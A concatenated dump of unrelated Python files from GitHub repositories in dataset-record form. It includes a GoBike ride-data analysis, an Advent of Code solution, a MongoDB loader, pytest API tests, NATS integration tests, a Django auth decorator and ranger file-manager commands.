Riders with age average of 30 have the most rides with duration of around 10 minutes.\n\n# ## Multivariate Exploration\n\n# In[67]:\n\n\n# create a subset of individual gender and user type to investigate time and station location\ngobike_m = gobike10.query('member_gender == \"Male\"') \ngobike_f = gobike10.query('member_gender == \"Female\"')\ngobike_o = gobike10.query('member_gender == \"Other\"')\ngobike_s = gobike10.query('user_type == \"Subscriber\"')\ngobike_c = gobike10.query('user_type == \"Customer\"')\n\n\n# In[68]:\n\n\n# plot of gender with station name and day of the week\nplt.figure(figsize = (12, 22))\n\nplt.subplot(3, 1, 1)\nsb.countplot(data = gobike_m, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Male')\n\nplt.subplot(3, 1, 2)\nsb.countplot(data = gobike_f, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Female')\n\nplt.subplot(3, 1, 3)\nsb.countplot(data = gobike_o, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Other');\n\n\n# Weekdays have most riders than than Weekends for both male, female and other with thursday and tuesday having the highest ride count. Market St at 10th St have most rides for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n\n# In[69]:\n\n\n# plot of gender with station name and time of the day\nplt.figure(figsize = (12, 20))\n\nplt.subplot(3, 1, 1)\nsb.countplot(data = gobike_m, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Male')\n\nplt.subplot(3, 1, 2)\nsb.countplot(data = gobike_f, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Female')\n\nplt.subplot(3, 1, 3)\nsb.countplot(data = gobike_o, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Time of the Day by Other');\n\n\n# Morning and Afternoon have the most ride for all gender\n\n# In[70]:\n\n\n# plot of user type with station name and day of the week\nplt.figure(figsize = (12, 14))\n\nplt.subplot(2, 1, 1)\nsb.countplot(data = gobike_s, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Day of the Week by Subscriber')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike_c, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Day of the Week by Customer');\n\n\n# Subscribers have more rides for weekdays than weekends. This suggest that subcribers are made up of residents/employees. Customers on the other hand, have weekends trips much more than the weekdays. This suggest that customers are highly made up of tourists/visitors. 
San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers. This location appears to be the most attrative site for tourist.\n\n# In[71]:\n\n\n# plot of user type with station name and time of the day\nplt.figure(figsize = (12, 14))\n\nplt.subplot(2, 1, 1)\nsb.countplot(data = gobike_s, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names');\nplt.title('Top 10 Trips in Time of the Day by Subscriber')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike_c, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.ylabel('Station names')\nplt.title('Top 10 Trips in Time of the Day by Customer');\n\n\n# Subscriber and customer have most trip for both morning and afternoon.\n\n# In[72]:\n\n\n# does age and duration determine when riders make trip? We will be using station id instead of station name for our FacetGrid plot \nprint(gobike10.groupby('start_station_name')['start_station_id'].value_counts())\norder = gobike10.start_station_id.value_counts().index\n\n\n# In[73]:\n\n\n# plot of the age by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'start_day', col_wrap = 3)\ng.map(sb.violinplot, 'start_station_id', 'age', order = order, color = colour, inner = 'quartile');\nplt.yscale('log');\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Age and Station by Day of the Week');\n\n\n# The relationship between age and station by day of the week have a median of around 30 years. This is not different from our earlier discovery\n\n# In[74]:\n\n\n# plot of the age by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'day_period', col_wrap = 3)\ng.map(sb.violinplot, 'start_station_id', 'age', order = order, color = colour, inner = 'quartile')\nplt.yscale('log')\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.yticks(ticker, ticker);\n\n\n# The relationship between age and station by time of the day also have a median of around 30 years. \n\n# In[75]:\n\n\n# plot of the duration by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week');\n\n\n# The relationship between duration and station by day of the week shows that weekends have the longest duration for a complete trip. Weekdays still maintains 10 minutes as depicted on our earlier plot\n\n# In[76]:\n\n\n# plot of the duration by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike10, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration for morning and afternoon have a median of around 10 minutes, but night riders tend to have a longer ride duration than morning and afternoon. Why is that so? 
Lets investigate further.\n\n# In[77]:\n\n\n# plot of the duration of subscribers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_s, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week for Subscribers');\n\n\n# Duration of subscribers trips by day of the week lies around 10mins for weekdays and a slight increase for weekends\n\n# In[78]:\n\n\n# plot of the duration of subscribers trips by time of the day in top 10 stations\ng = sb.FacetGrid(data = gobike_s, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration of subscribers trips by time of the day shows that subscribers have a longer trip at night\n\n# In[79]:\n\n\n# plot of the duration of customers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_c, col = 'start_day', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker)\ng.fig.subplots_adjust(top=0.9)\ng.fig.suptitle('Relationship between Duration and Station by Day of the Week for Customers');\n\n\n# Duration of customers trips by day of the week tends to be above 10mins for both weekdays and weekends\n\n# In[80]:\n\n\n# plot of the duration of customers trips by day of the week in top 10 stations\ng = sb.FacetGrid(data = gobike_c, col = 'day_period', col_wrap = 3)\ng.map(sb.boxplot, 'start_station_id', 'duration_mins', order = order, color = colour);\nplt.yscale('log')\nticker = [0.08, 10, 20, 100, 1000]\nplt.yticks(ticker, ticker);\n\n\n# Duration of customers trips by time of the day shows that customers have a longer trip at night\n\n# ### Talk about some of the relationships you observed in this part of the investigation. Were there features that strengthened each other in terms of looking at your feature(s) of interest?\n# \n# > Plotting station location, time and riders characteristics (gender) gave more insights on station location. Market St at 10th St and San Francisco Caltrain Station 2 (Townsend St at 4th St) were ranked top two stations having the most traffic of over three thousand rides, with weekdays having the most rides than weekends. Comparing Market St at 10th St and San Francisco Caltrain Station 2 (Townsend St at 4th St) weekend rides showed that Market St at 10th St have most trips for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n# \n# > Plotting station location, time and riders characteristics (user type) shows that subscribers have most rides for weekdays than weekends. Customers on the other hand have most rides on weekends than weekdays. This could justify our assumption that subscribers are mostly made up of employees or residents in that area, while customers may just be visitors or tourist visiting the location. For our all top 10 station location, San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers. 
This location seems to be the most attrative site for tourist.\n# \n# ### Were there any interesting or surprising interactions between features?\n# \n# > The relationship between duration and station location by time shows that weekends have the longest duration for a complete trip. Weekdays still maintains 10 minutes duration. Night riders tend to have a longer ride duration than morning and afternoon. Investigating further with user type shows that duration of subscribers trips by day of the week lies around 10mins for weekdays and a slight increase for weekends, this is not the same for customers having trips which duration tend to be above 10mins for both weekdays and weekends. For both user type, night period always have longer duration.\n\n# ## Conclusions\n# > Subscribers have most rides for weekdays than weekends. Customers on the other hand have most rides on weekends than weekdays. Of the top 2 station locations, Market St at 10th St have most trips for weekends than San Francisco Caltrain Station 2 (Townsend St at 4th St), while for our all top 10 station location, San Francisco Ferry Building (Harry Bridges Plaza) have the most weekend ride for customers.\n# \n# > Duration of trip for customers is longer than that of subscribers for every day of the week and time of the day.\n","repo_name":"macQaries/Ford-GoBike-System-Data","sub_path":"Ford_GoBike_System_Data_Part1.py","file_name":"Ford_GoBike_System_Data_Part1.py","file_ext":"py","file_size_in_byte":43115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43045981891","text":"from collections import defaultdict, deque\nimport time\n\"\"\"\nDetermine the number of Lantern Fish that will exist after a given number of days.\nLantern fish give birth every 7 days.\n\nThe input represents each fish's reproduction timer, which counts down from 6 to 0.\nWhen it reaches 0, the fish produces another fish with a timer value of eight (it takes\n2 days to begin its 7-day reproduction cycle), and its own timer is reset to 6.\n\nPart 1: Find the number of fish after 80 days.\n\nPart 2: FInd the number of fish after 256 days.\n\"\"\"\n\nfrom collections import defaultdict\n\ndata = open('2021/data/day06').readlines()[0].split(',')\ndays = [80, 256]\n\nfor part in [0, 1]:\n start = time.time()\n fish = map(lambda x: int(x), data)\n\n d = deque([0]*9)\n for f in fish: d[f]+= 1\n\n for day in range(days[part]):\n v = d.popleft()\n d.append(v)\n d[6]+= v\n\n # Slower solution (my original) usig dict keys instead of a circular buffer \n # d = defaultdict(int)\n # for f in fish: d[f]+= 1\n\n # for day in range(days[part]):\n # zeros = None\n # for k, v in sorted(d.items()):\n # if k == 0:\n # zeros = v\n # else:\n # d[k-1]+= v\n # del d[k]\n # if zeros is not None:\n # d[6]+= zeros\n # d[8]+= zeros\n # d[0]-= zeros\n\n # print('Part %d: %d Time: %d secs' % (part+1, sum(d.values()), time.time() - start))\n print('Part %d: %d Time: %d secs' % (part+1, sum(d), time.time() - start))\n\n\n# Part 1: 359344\n# Part 2: 1629570219571\n","repo_name":"MidnightJava/adventOfCode","sub_path":"AocPython/src/myAoc/2021/Day06.py","file_name":"Day06.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41650154190","text":"\"\"\"\n---------\nloader.py\n---------\n\nA minimal code to store data in MongoDB\n\"\"\"\nimport csv\nimport json\nfrom datetime import datetime\nfrom pymongo import 
MongoClient\n\n\ndef load_orders():\n \"\"\"Load orders sample data\"\"\"\n client = MongoClient('localhost', 27017)\n orders = client[\"orders\"]\n\n # insert customers data\n customers = orders[\"customers\"]\n\n with open('customers.csv') as csvfile:\n customers_data = list(csv.DictReader(csvfile))\n\n _ = customers.insert_many(customers_data)\n\n # insert items data\n items_ordered = orders[\"items_ordered\"]\n\n with open('items_ordered.csv') as csvfile:\n items_ordered_data = list(csv.DictReader(csvfile))\n\n _ = items_ordered.insert_many(items_ordered_data)\n\n\ndef load_airbnb():\n \"\"\"Load AirBnB sample data\"\"\"\n client = MongoClient('localhost', 27017)\n airbnb = client[\"airbnb\"]\n sample_data = airbnb[\"sample_data\"]\n\n with open(\"airbnb.json\", \"r\") as f_in:\n data = json.load(f_in)\n\n for d in data:\n for key, val in d.items():\n if isinstance(val, dict):\n if \"$date\" in val.keys():\n d[key] = datetime.fromtimestamp(val[\"$date\"] / 1000)\n elif \"$numberDecimal\" in val.keys():\n d[key] = val[\"$numberDecimal\"]\n try:\n sample_data.insert(d)\n except:\n pass\n\n\ndef main():\n \"\"\"The main script\"\"\"\n load_airbnb()\n load_orders()\n\n\nif __name__ == \"__main__\":\n main()\n print(\"Done!\")\n","repo_name":"enel-gdh-educational/katacoda-scenarios","sub_path":"mongodb/assets/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"38805874620","text":"def selectionSort(array, size):\r\n for step in range(size):\r\n min_idx = step\r\n for i in range(step + 1, size):\r\n # select the minimum element in each loop\r\n if array[i] < array[min_idx]:\r\n min_idx = i\r\n # put min at the correct position\r\n (array[step], array[min_idx]) = (array[min_idx], array[step])\r\n\r\n\r\nif __name__ == '__main__':\r\n list=[]\r\n n = int(input(\"Enter number of elements : \"))\r\n for i in range(0, n):\r\n ele = int(input())\r\n list.append(ele)\r\nsize = len(list)\r\nprint(list)\r\nselectionSort(list, size)\r\nprint('Sorted Array in Ascending Order:')\r\nprint(list)# Selection sort in Python","repo_name":"Surya-prathamzzz/LP2","sub_path":"assign03.py","file_name":"assign03.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29972484971","text":"from typing import Literal, Union\r\n\r\n# Filter\r\nEQ: Literal[\"equals\"]\r\nNOT_EQ: Literal[\"doesNotEqual\"]\r\nCONTAINS: Literal[\"contains\"]\r\nEXCLUDES: Literal[\"excludes\"]\r\nGT: Literal[\"greaterThan\"]\r\nLT: Literal[\"lessThan\"]\r\nLTE: Literal[\"lessThanOrEqual\"]\r\nGTE: Literal[\"greaterThanOrEqual\"]\r\n\r\nFilterSearchType = Union[\r\n Literal[\"equals\"],\r\n Literal[\"doesNotEqual\"],\r\n Literal[\"contains\"],\r\n Literal[\"excludes\"],\r\n Literal[\"greaterThan\"],\r\n Literal[\"lessThan\"],\r\n Literal[\"lessThanOrEqual\"],\r\n Literal[\"greaterThanOrEqual\"],\r\n]\r\n\r\n# Aggregate\r\nAVG: Literal[\"average\"]\r\nCOUNT: Literal[\"count\"]\r\nSUM: Literal[\"sum\"]\r\nMIN: Literal[\"min\"]\r\nMAX: Literal[\"max\"]\r\n\r\nAggregateSearchType = Union[Literal[\"average\"], Literal[\"count\"], Literal[\"sum\"], Literal[\"min\"], Literal[\"max\"]]\r\n\r\n# GroupBy\r\nGB: Literal[\"groupBy\"]\r\nHOUR: Literal[\"groupByHour\"]\r\nDAY: Literal[\"groupByDay\"]\r\nWEEK: Literal[\"groupByWeek\"]\r\nMONTH: Literal[\"groupByMonth\"]\r\nQUARTER: Literal[\"groupByQuarter\"]\r\nYEAR: 
Literal[\"groupByYear\"]\r\n\r\nGroupBySearchType = Union[\r\n Literal[\"groupBy\"],\r\n Literal[\"groupByHour\"],\r\n Literal[\"groupByDay\"],\r\n Literal[\"groupByWeek\"],\r\n Literal[\"groupByMonth\"],\r\n Literal[\"groupByQuarter\"],\r\n Literal[\"groupByYear\"],\r\n]\r\n\r\n# Sorts\r\nASC: Literal[\"ascending\"]\r\nDESC: Literal[\"descending\"]\r\n\r\nSortSearchType = Union[Literal[\"ascending\"], Literal[\"descending\"]]\r\n","repo_name":"SoftcatMS/swimlane-stubs","sub_path":"swimlane-stubs/core/search.pyi","file_name":"search.pyi","file_ext":"pyi","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28934319904","text":"import pytest\nimport openpyxl\nimport requests\nimport json\nfrom jsonpath_ng import jsonpath, parse\n\n'''\nThis routine loads the data from excel file as List of Dictionary. \n'''\n\n\ndef get_data(test_type):\n\n if test_type == 'smoke':\n data_sheet = \"Smoke\"\n elif test_type == 'regression':\n data_sheet = \"Regression\"\n else:\n data_sheet = \"Functional\"\n\n book = openpyxl.load_workbook(\"Data.xlsx\")\n sheet = book[data_sheet]\n testcases=[]\n for row in range(2,sheet.max_row+1):\n test={}\n for column in range(1, sheet.max_column+1):\n test[sheet.cell(row=1,column=column).value]=sheet.cell(row=row,column=column).value # adding as dict\n testcases.append(test)\n return testcases\n\n\n'''\nBelow is the test that runs 'n' number of times based on the number of lines on the spreadsheet.\n'''\n\n\n@pytest.mark.smoke\n@pytest.mark.parametrize('tests',get_data(\"smoke\"))\ndef test_return_code(tests):\n\n response = requests.get(tests['url'])\n assert response.status_code == tests['return_code']\n\n\n@pytest.mark.regression\n@pytest.mark.parametrize('tests',get_data(\"regression\"))\ndef test_regression(tests):\n response = requests.get(tests['url'])\n response_body = json.loads(response.text)\n assert response_body == json.loads(tests['expected']) # comparing the API response vs expected JSON from excel.\n\n\n@pytest.mark.functional\n@pytest.mark.parametrize('tests', get_data(\"functional\"))\ndef test_functional(tests):\n global response\n if tests['url'] != None:\n response = requests.get(tests['url'])\n else:\n response_body = json.loads(response.text)\n jsonpath_expression = parse(tests['Jpath'])\n for match in jsonpath_expression.find(response_body):\n assert match.value == tests['Expected']\n\n\n\n\n","repo_name":"pvenkas/Python_REST_API_Test_Framework","sub_path":"test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12220790306","text":"import os\nfrom prime_numbers import prime_numbers\n\nif os.path.exists('D:/МОЕ/универ/программирование/практика 6/input4.txt'): # проверка существования файла\n file = open('input4.txt', 'r')\n Number = int(file.readline())\n prime_numbers(Number)\n\nelse: # если файл с исходными данными не существует, то пишем об этом\n file = open('output4.txt', 'w')\n file.write('Файл с входными данными не обнаружен')\n file.close()\n","repo_name":"froshiksid/practice","sub_path":"практика 6/lab6-5_3.py","file_name":"lab6-5_3.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15325553265","text":"\"\"\"\nIntegration tests for autopilotpattern/nats. 
These tests are executed\ninside a test-running container based on autopilotpattern/testing.\n\"\"\"\nimport os\nimport re\nfrom collections import defaultdict\nfrom os.path import expanduser\nimport random\nimport subprocess\nimport string\nimport sys\nimport time\nimport unittest\nimport uuid\n\nfrom IPy import IP  # assumed dependency for the IP comparison in check_routes\nfrom testcases import AutopilotPatternTest, WaitTimeoutError, \\\n    dump_environment_to_file\nimport consul as pyconsul\n\n\nclass NatsTest(AutopilotPatternTest):\n\n    project_name = 'nats'\n\n    def setUp(self):\n        \"\"\"\n        autopilotpattern/nats setup.sh writes an _env file with a CNS\n        entry for Consul. If this has been mounted from the test environment,\n        we'll use that, otherwise we have to generate it from the environment.\n        Then make sure we use the external CNS name for the test rig.\n        \"\"\"\n        account = os.environ['TRITON_ACCOUNT']\n        dc = os.environ['TRITON_DC']\n        internal = 'consul-nats.svc.{}.{}.cns.joyent.com'.format(account, dc)\n        external = 'consul-nats.svc.{}.{}.triton.zone'.format(account, dc)\n        test_consul_host = os.environ.get('CONSUL', external)\n\n        if not os.path.isfile('_env'):\n            os.environ['CONSUL'] = internal\n            dump_environment_to_file('_env')\n\n        os.environ['CONSUL'] = test_consul_host\n\n\n    def test_join_cluster(self):\n        \"\"\"\n        Check that 3 NATS servers can cluster together given a healthy one\n        \"\"\"\n        self.instrument(self.wait_for_containers,\n                       {'nats': 1, 'consul': 1}, timeout=300)\n        self.compose_scale('nats', 2)\n        self.instrument(self.wait_for_service, 'nats', count=2, timeout=120)\n\n        _, nats1_ip = self.get_ips('nats_1')\n\n        self.check_routes([nats1_ip], 'nats_2')\n\n\n    def wait_for_containers(self, expected={}, timeout=30):\n        \"\"\"\n        Waits for all containers to be marked as 'Up' for all services.\n        `expected` should be a dict of {\"service_name\": count}.\n        TODO: lower this into the base class implementation.\n        \"\"\"\n        svc_regex = re.compile(r'^{}_(\\w+)_\\d+$'.format(self.project_name))\n\n        def get_service_name(container_name):\n            return svc_regex.match(container_name).group(1)\n\n        while timeout > 0:\n            containers = self.compose_ps()\n            found = defaultdict(int)\n            states = []\n            for container in containers:\n                service = get_service_name(container.name)\n                found[service] = found[service] + 1\n                states.append(container.state == 'Up')\n            if all(states):\n                if not expected or found == expected:\n                    break\n            time.sleep(1)\n            timeout -= 1\n        else:\n            raise WaitTimeoutError(\"Timed out waiting for containers to start.\")\n\n\n    def check_routes(self, expected, container='nats_2', timeout=60):\n        expected.sort()\n        patt = '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:6222'\n        while timeout > 0:\n            conf = self.docker_exec(container,\n                                    'cat /etc/gnatsd.conf')\n            actual = re.findall(patt, conf)\n            actual = [IP(a.replace(':6222', '').strip())\n                      for a in actual]\n            actual.sort()\n            if actual == expected:\n                break\n\n            timeout -= 1\n            time.sleep(1)\n        else:\n            self.fail(\"expected {} but got {} for NATS routes\"\n                      .format(expected, actual))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"autopilotpattern/nats","sub_path":"test/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"28958562034","text":"import traceback\nimport bleach\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_401_UNAUTHORIZED, \\\n    HTTP_400_BAD_REQUEST, HTTP_500_INTERNAL_SERVER_ERROR\nfrom engagementmanager.service.authorization_service import \\\n    
AuthorizationService\nfrom engagementmanager.utils.request_data_mgr import request_data_mgr\nfrom engagementmanager.service.logging_service import LoggingServiceFactory\n\nlogger = LoggingServiceFactory.get_logger()\n\n\ndef auth(action, is_internal=False):\n \"\"\"\n Check that given action is permitted by the user\n \"\"\"\n def _dec(func):\n def _new_func(*args, **kwargs):\n auth_service = AuthorizationService()\n\n # Extract USER - A MUST Have in KWARGS #\n user = request_data_mgr.get_user()\n if user is None:\n msg = \"user couldn't be identified in the request\"\n logger.error(msg)\n if (is_internal):\n return msg, HTTP_400_BAD_REQUEST\n return Response(msg, status=status.HTTP_400_BAD_REQUEST)\n\n checklist_uuid = request_data_mgr.get_cl_uuid()\n eng_uuid = request_data_mgr.get_eng_uuid()\n\n try:\n result = None\n message = None\n result, message = auth_service.is_user_able_to(\n user, action, eng_uuid, checklist_uuid)\n logger.debug(\n 'Authorization Service : ' +\n action.name +\n '. Result=' +\n str(result) +\n '. message=' +\n str(message))\n if not result:\n msg = \"User not authorized: \" + \\\n str(user.uuid) + \". eng_uuid=\" + str(eng_uuid) + \\\n \". checklist_uuid=\" + str(checklist_uuid)\n if (is_internal):\n return msg, HTTP_401_UNAUTHORIZED\n msg = bleach.clean(msg, tags=['a', 'b'])\n return Response(msg, status=status.HTTP_401_UNAUTHORIZED)\n\n except Exception as e:\n logger.error(\n \"=====================Exception=====================\")\n msg = \"A problem occurred while trying \\\n to authorize user.uuid= \" + \\\n str(user.uuid) + \". eng_uuid=\" + str(eng_uuid) + \\\n \". checklist_uuid=\" + \\\n str(checklist_uuid) + \"action=\" + str(action)\n logger.error(str(e) + \" Message: \" + msg)\n logger.error(traceback.format_exc())\n logger.error(\n \"===================================================\")\n\n if (is_internal):\n return msg, HTTP_500_INTERNAL_SERVER_ERROR\n msg = \"Action was failed to be performed\"\n return Response(\n msg, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n return func(*args, **kwargs)\n\n return _new_func\n\n return _dec\n","repo_name":"onap/vvp-engagementmgr","sub_path":"django/engagementmanager/decorator/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33032034565","text":"from functools import partial\nimport os\nimport os.path\nfrom pathlib import Path\nfrom typing import Generator, Iterable, Set, List\n\nfrom ranger.api.commands import Command\n\n\nclass z(Command):\n \"\"\"\n :z \n\n Jump to a directory using fasd. 
Supports tab completion.\n \"\"\"\n def execute(self) -> None:\n args = self.rest(1).split()\n if args:\n directories = self._get_directories(*args)\n if directories:\n self.fm.cd(directories[0])\n else:\n self.fm.notify(\"No results from fasd\", bad=True)\n\n def tab(self, tabnum: int) -> Generator[str, None, None]:\n start, current = self.start(1), self.rest(1)\n for path in self._get_directories(*current.split()):\n yield start + path\n\n @staticmethod\n def _get_directories(*args) -> List[str]:\n import subprocess\n output = subprocess.check_output([\"fasd\", \"-dl\", *args], universal_newlines=True)\n dirs = output.strip().split(\"\\n\")\n dirs.sort(reverse=True) # Listed in ascending frecency\n return dirs\n\n\n# TODO make standalone script\nclass dot(Command):\n \"\"\"\n :dot \n\n Move files to the dotfiles package .\n Files are either those tagged with `.` (entire tree),\n marked or currently selected.\n \"\"\"\n BASE_DIR = Path(\"~\").expanduser()\n DOTFILES_DIR = Path(\"~/dotfiles\").expanduser()\n TAG = '.'\n\n def execute(self) -> None:\n pkg_name = self.arg(1)\n if not pkg_name:\n self.fm.notify(\"Missing package name\", bad=True)\n return\n elif self.rest(2):\n self.fm.notify(\"Too many arguments\", bad=True)\n return\n\n paths = self._collect_paths()\n try:\n rel_paths = tuple(sorted(p.relative_to(self.BASE_DIR) for p in paths))\n except ValueError as e:\n self.fm.notify(str(e), bad=True)\n return\n\n self._check_confirm_paths(pkg_name, rel_paths)\n\n def _check_confirm_paths(self, pkg_name: str, rel_paths: Iterable[Path]) -> None:\n self.fm.ui.console.ask(\n f\"Add files to pkg {pkg_name!r}? [y/n] | {', '.join(map(str, rel_paths))}\",\n partial(self._on_confirm_paths, pkg_name, rel_paths),\n ('y', 'n')\n )\n\n def _on_confirm_paths(self, pkg_name: str, rel_paths: Iterable[Path], answer: str) -> None:\n if answer.lower() == 'n':\n return\n\n if pkg_name not in self._pkg_names():\n self.fm.ui.console.ask(\n f\"dotfile package {pkg_name!r} does not exist. Create? [y/n]\",\n partial(self._on_confirm_pkg_name, pkg_name, rel_paths),\n ('y', 'n')\n )\n else:\n self._import_dotfiles(pkg_name, rel_paths)\n\n def _on_confirm_pkg_name(self, pkg_name: str, rel_paths: Iterable[Path], answer: str) -> None:\n if answer.lower() == 'y':\n self._import_dotfiles(pkg_name, rel_paths)\n\n def _import_dotfiles(self, pkg_name: str, rel_paths: Iterable[Path]) -> None:\n import shutil\n\n pkg_dir = self.DOTFILES_DIR / pkg_name\n\n src_paths = [self.BASE_DIR / p for p in rel_paths]\n dst_paths = [pkg_dir / p for p in rel_paths]\n existing_paths = [p for p in dst_paths if p.exists()]\n if existing_paths:\n self.fm.notify(f\"Files already exist: {', '.join(map(str, existing_paths))}\", bad=True)\n # TODO could ask to overwrite\n return\n\n for src, dst in zip(src_paths, dst_paths):\n rel_dst = os.path.relpath(dst, start=src.parent)\n try:\n dst.parent.mkdir(parents=True, exist_ok=True)\n shutil.move(src, dst)\n except Exception as e:\n self.fm.notify(f\"Couldn't move {src!s} to {dst!s}\", bad=True, exception=e)\n continue\n else:\n try:\n src.symlink_to(rel_dst)\n except ValueError as e:\n self.fm.notify(f\"Couldn't symlink {src!s} to {dst!s}\", bad=True, exception=e)\n\n # Cannot use tags.remove(*src_path)\n # because they could have been expanded earlier.\n # Instead, we erase all '.' 
tags.\n for path, tag in self.fm.tags.tags.items():\n if tag == self.TAG:\n self.fm.tags.remove(path)\n\n self.fm.ui.status.need_redraw = True\n self.fm.ui.need_redraw = True\n\n def _collect_paths(self) -> Set[Path]:\n files: Set[str] = set()\n if self.fm.tags:\n files = {p for p, tag in self.fm.tags.tags.items() if tag == self.TAG}\n\n if not files:\n files = {obj.path for obj in self.fm.thistab.get_selection()}\n\n # expand directories\n expanded_paths: Set[Path] = set()\n for fpath in files:\n path = Path(fpath)\n if path.is_dir():\n expanded_paths |= {p for p in path.rglob(\"*\") if p.is_file()}\n else:\n expanded_paths.add(path)\n\n # filter symlinks\n filtered_paths = {p for p in expanded_paths if not p.is_symlink()}\n\n return filtered_paths\n\n def tab(self, tabnum: int) -> Generator[str, None, None]:\n start, current = self.start(1), self.rest(1)\n for name in sorted(self._pkg_names()):\n if name.startswith(current):\n yield start + name\n\n @classmethod\n def _pkg_names(cls) -> Generator[str, None, None]:\n yield from (p.name for p in cls.DOTFILES_DIR.iterdir() if p.is_dir())\n\n\nclass unlink(Command):\n \"\"\"\n :unlink []\n\n Replace a symlink with the thing it links to and optionally remove the original.\n \"\"\"\n\n def execute(self):\n import shutil\n remove = bool(self.arg(1))\n\n fileobjs = self.fm.thistab.get_selection()\n paths = {Path(obj.path) for obj in fileobjs}\n for src in paths:\n if not src.is_symlink():\n continue\n try:\n dst = src.resolve(strict=True)\n except FileNotFoundError:\n self.fm.notify(f\"Target of {src!s} does not exist\", bad=True)\n continue\n src.unlink()\n if remove:\n shutil.move(dst, src)\n else:\n shutil.copy2(dst, 